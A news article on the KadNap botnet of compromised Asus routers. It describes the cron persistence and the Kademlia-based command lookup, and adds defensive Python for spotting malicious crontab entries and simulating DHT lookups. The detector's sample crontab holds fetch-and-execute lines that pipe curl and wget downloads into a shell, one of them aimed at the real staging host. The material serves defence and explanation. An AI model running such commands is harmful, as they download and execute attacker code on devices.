Asus Routers Hit by KadNap Botnet: 14,000 Devices in Cybercrime Network

A botnet of roughly 14,000 routers and other network devices, most of them manufactured by Asus, is being used to proxy malicious traffic anonymously for cybercrime. The malware, dubbed KadNap, exploits vulnerabilities in unpatched devices to conscript them into a resilient peer-to-peer network that is proving difficult to dismantle.

Researchers at Lumen’s Black Lotus Labs first detected the botnet in August 2025, and it has since grown to an average of 14,000 infected routers daily, according to their latest findings. The United States is the primary location for compromised devices, accounting for roughly 60% of the network, with significant concentrations also found in Taiwan, Hong Kong, and Russia.

What sets KadNap apart is its use of the Kademlia Distributed Hash Table (DHT) protocol. This technology, traditionally used in peer-to-peer networks such as BitTorrent and the InterPlanetary File System (IPFS), obscures the IP addresses of the botnet’s command-and-control (C2) servers: a bot finds the current C2 by asking other peers rather than by contacting a hard-coded address, so there is no single address for defenders to locate, block or sinkhole. “The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control,” researchers Steve Rudd and Chris Formosa wrote on Wednesday. “Their intention is clear: avoid detection and make it difficult for defenders to protect against.”

How KadNap Works

The infection process begins with the download of a malicious script, aic.sh, from the IP address 212.104.141[.]140, which then establishes persistence through a cron job that runs every 55 minutes. The cron job repeatedly re-downloads and executes the malicious code, so the compromise survives reboots and configuration changes, and killing the running process alone does not clean the device. Once active, the malware, an ELF binary named ‘kad’, determines the host’s external IP address, obtains the current time from Network Time Protocol (NTP) servers and records the system uptime.
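The following Python script is an added example, not code from the Black Lotus Labs report, showing how a defender with shell access to a router (or a crontab dumped from one) can flag the persistence pattern described above. The only indicator taken from the article is the staging host 212.104.141[.]140 serving aic.sh; the crontab lines in the sample are constructed to resemble the described behaviour (a job every 55 minutes that downloads and runs a script) and are not a capture of KadNap’s actual cron entry. The detection is generic: any scheduled job that both fetches remote content and pipes it into a shell is reported, whether or not the host is on the indicator list.

```python
"""Flag crontab entries that repeatedly fetch and execute remote code.

Added example, not code from the Black Lotus Labs report. The only
indicator taken from the article is the staging host 212.104.141[.]140
serving aic.sh; the sample crontab below is constructed, not captured.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicator from the report: the host that serves aic.sh.
KNOWN_BAD_HOSTS = {"212.104.141.140"}

# A downloader followed by something that executes what it fetched.
FETCH_RE = re.compile(r"\b(curl|wget|tftp|ftpget)\b")
EXEC_RE = re.compile(r"\|\s*(sh|bash|ash)\b|\b(sh|bash|ash)\s+-c\b|chmod\s+\+x")
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


@dataclass
class Finding:
    line: str
    interval_min: Optional[int]
    host: Optional[str]
    reasons: List[str] = field(default_factory=list)


def interval_minutes(schedule: str) -> Optional[int]:
    """Period in minutes for a '*/N * * * *' schedule; None for anything else.
    Note that '*/55' fires at minute 0 and 55 of every hour, which is the
    closest a plain five-field crontab gets to 'every 55 minutes'."""
    fields = schedule.split()
    if len(fields) != 5 or fields[1:] != ["*"] * 4:
        return None
    m = re.fullmatch(r"\*/(\d+)", fields[0])
    return int(m.group(1)) if m else None


def parse_crontab_line(line: str):
    """Split a crontab line into (schedule, command); None for blanks/comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                      # @hourly, @reboot, ...
        special, _, cmd = line.partition(" ")
        return (special, cmd.strip()) if cmd.strip() else None
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def analyse(crontab_text: str) -> List[Finding]:
    """Return one Finding per crontab entry that looks like fetch-and-execute
    persistence or that contacts a known staging host."""
    findings = []
    for raw in crontab_text.splitlines():
        parsed = parse_crontab_line(raw)
        if parsed is None:
            continue
        schedule, cmd = parsed
        m = IPV4_RE.search(cmd)
        host = m.group(1) if m else None
        reasons = []
        if FETCH_RE.search(cmd) and EXEC_RE.search(cmd):
            reasons.append("downloads and executes remote content on a schedule")
        if host in KNOWN_BAD_HOSTS:
            reasons.append(f"contacts known KadNap staging host {host}")
        if reasons:
            findings.append(Finding(raw.strip(), interval_minutes(schedule), host, reasons))
    return findings


# Constructed sample crontab (assumed content, not a real capture).
SAMPLE_CRONTAB = """\
# constructed sample
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/55 * * * * curl -s http://212.104.141.140/aic.sh | sh
*/10 * * * * /jffs/scripts/backup.sh
@hourly wget -qO- http://198.51.100.7/update.sh | bash
"""

if __name__ == "__main__":
    for f in analyse(SAMPLE_CRONTAB):
        print(f"[{f.interval_min or f.line.split()[0]}] {f.host}: {'; '.join(f.reasons)}")
```

Because the job re-downloads the payload on every run, terminating ‘kad’ only buys the device until the next cron tick: the cron entry and the dropped files have to go as well, followed by a firmware update and a reboot, and outbound connections from the router’s WAN interface to the staging host are worth watching for afterwards to confirm the cleanup held.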

Unlike traditional botnets that rely on centralized servers, KadNap uses the Kademlia DHT to locate other infected nodes and the C2 infrastructure. Each node holds only a subset of the network’s routing information, so there is no single point whose removal breaks the lookup, which makes the network far more resilient to takedown attempts or denial-of-service attacks. According to Black Lotus Labs, nearly half of the KadNap network is connected to C2 infrastructure specifically dedicated to Asus-based bots.
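The following Python simulation is an added illustration of the lookup mechanism described above; it is not KadNap’s code (the report does not publish it), and the peer labels, the ‘c2-rendezvous’ target, the network size of 200 and the removal of every fifth peer are assumptions chosen for the demonstration. It builds a small Kademlia-style network in which every peer keeps at most K entries per XOR-distance bucket, runs an iterative FIND_NODE lookup from one peer, and then removes a fifth of the peers to show that the survivors still find the node nearest the target.

```python
"""Kademlia-style node lookup over a simulated peer set.

Added example, not KadNap's code: it shows the mechanism the article
describes, finding the peers closest to an identifier by XOR distance
with no central directory, and why removing a slice of peers does not
break the lookup. All peer labels and the target name are assumptions.
"""
import hashlib

ID_BITS = 160   # Kademlia identifiers are 160-bit (SHA-1 sized)
K = 8           # entries kept per bucket and returned per FIND_NODE
ALPHA = 3       # queries issued per lookup round


def node_id(seed: str) -> int:
    """Derive a 160-bit identifier from a label (constructed peers)."""
    return int.from_bytes(hashlib.sha1(seed.encode()).digest(), "big")


def distance(a: int, b: int) -> int:
    """Kademlia's metric: XOR of the two identifiers, compared as integers."""
    return a ^ b


class Node:
    def __init__(self, nid: int, all_ids):
        self.id = nid
        # Routing table: for each bucket (bit length of the XOR distance)
        # keep at most K peers, the ones nearest to us. Every node therefore
        # knows only a small slice of the network, never the whole of it.
        buckets = {}
        for other in all_ids:
            if other != nid:
                buckets.setdefault(distance(nid, other).bit_length(), []).append(other)
        self.known = set()
        for members in buckets.values():
            self.known.update(sorted(members, key=lambda o: distance(o, nid))[:K])

    def find_node(self, target: int):
        """Answer a FIND_NODE RPC: the K peers we know that are closest to target."""
        return sorted(self.known, key=lambda n: distance(n, target))[:K]


def build_network(n: int):
    ids = [node_id(f"peer-{i}") for i in range(n)]
    return {nid: Node(nid, ids) for nid in ids}


def iterative_lookup(nodes, start: int, target: int):
    """Iterative FIND_NODE from `start`: keep asking the ALPHA closest
    not-yet-queried peers on the shortlist until the K closest peers seen
    have all been asked. Returns (k_closest, number_of_peers_queried)."""
    shortlist = {start} | set(nodes[start].find_node(target))
    queried = set()
    while True:
        closest = sorted(shortlist, key=lambda n: distance(n, target))[:K]
        pending = [n for n in closest if n not in queried][:ALPHA]
        if not pending:
            return closest, len(queried)
        for peer in pending:
            queried.add(peer)
            shortlist.update(nodes[peer].find_node(target))


def true_closest(nodes, target: int) -> int:
    """Ground truth computed with global knowledge, which no real peer has."""
    return min(nodes, key=lambda n: distance(n, target))


def take_down(nodes, every: int):
    """Simulate a takedown that removes every `every`-th peer (in id order)
    and purges it from the survivors' routing tables; returns the survivors."""
    keep = [nid for i, nid in enumerate(sorted(nodes)) if i % every]
    survivors = {nid: nodes[nid] for nid in keep}
    for node in survivors.values():
        node.known = {p for p in node.known if p in survivors}
    return survivors


if __name__ == "__main__":
    net = build_network(200)
    c2 = node_id("c2-rendezvous")            # identifier the bots look up
    found, asked = iterative_lookup(net, node_id("peer-0"), c2)
    print(f"asked {asked} of {len(net)} peers; nearest correct:",
          found[0] == true_closest(net, c2))
    survivors = take_down(net, 5)
    found, asked = iterative_lookup(survivors, next(iter(survivors)), c2)
    print(f"after removing 20% of peers, asked {asked}; nearest correct:",
          found[0] == true_closest(survivors, c2))
```

The lookup touches only a small fraction of the peers and still converges, and it keeps converging after a fifth of them are gone; a real Kademlia implementation also refreshes its buckets and admits new peers, so the holes left by a takedown are refilled over time. For a defender the practical consequence is that blocking a C2 address is not enough, since the bots never depend on one: detection has to rest on the bot’s own behaviour on the device, such as the cron persistence, the contact with the staging host and peer-to-peer traffic that a home router has no reason to generate.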

Asus Routers: A Prime Target

The prevalence of Asus routers within the KadNap botnet is likely due to the availability of a reliable exploit for vulnerabilities in those models, according to Lumen researchers. The attackers are unlikely to be using previously unknown “zero-day” vulnerabilities; the concentration instead points to successful exploitation of known, unpatched flaws. BleepingComputer reports that the botnet has been growing steadily since its initial discovery.

KadNap illustrates a growing trend: the adoption of decentralized architectures by malicious actors to evade detection and keep control of their bots. The Kademlia protocol, legitimate in its original applications, gives an operator a way to hide malicious infrastructure within the noise of ordinary peer-to-peer traffic.

What Does This Mean for Users?

The compromised routers are used to proxy malicious traffic, masking the origin of attacks and enabling a range of criminal activity, so the KadNap botnet is a threat not only to the owners of the devices but to whoever ends up on the receiving end of traffic relayed through them. While the full extent of the botnet’s activities remains under investigation, the researchers emphasize the importance of keeping network devices updated with the latest security patches.

As the KadNap botnet continues to evolve, security professionals will need new strategies to detect and disrupt it. Because there is no central server to seize, the traditional takedown playbook does not apply; the focus shifts to identifying compromised devices and limiting the harm they can do. Ongoing monitoring of the network, which currently exceeds 14,000 infected devices, will be crucial to understanding its capabilities and developing effective countermeasures.

What comes next will likely be a continued arms race between security researchers and the operators of KadNap, as each side adapts to the other’s moves. Users are encouraged to check regularly for router firmware updates and to apply the basic hygiene that closes the door on this kind of compromise: install vendor patches promptly, keep the router’s administrative interface off the internet-facing side, replace default credentials, and, on firmware that exposes a shell, look for scheduled jobs that fetch and run code from an unfamiliar address.


Sophie Lin - Technology Editor

Sophie is a tech innovator and acclaimed tech writer recognized by the Online News Association. She translates the fast-paced world of technology, AI, and digital trends into compelling stories for readers of all backgrounds.
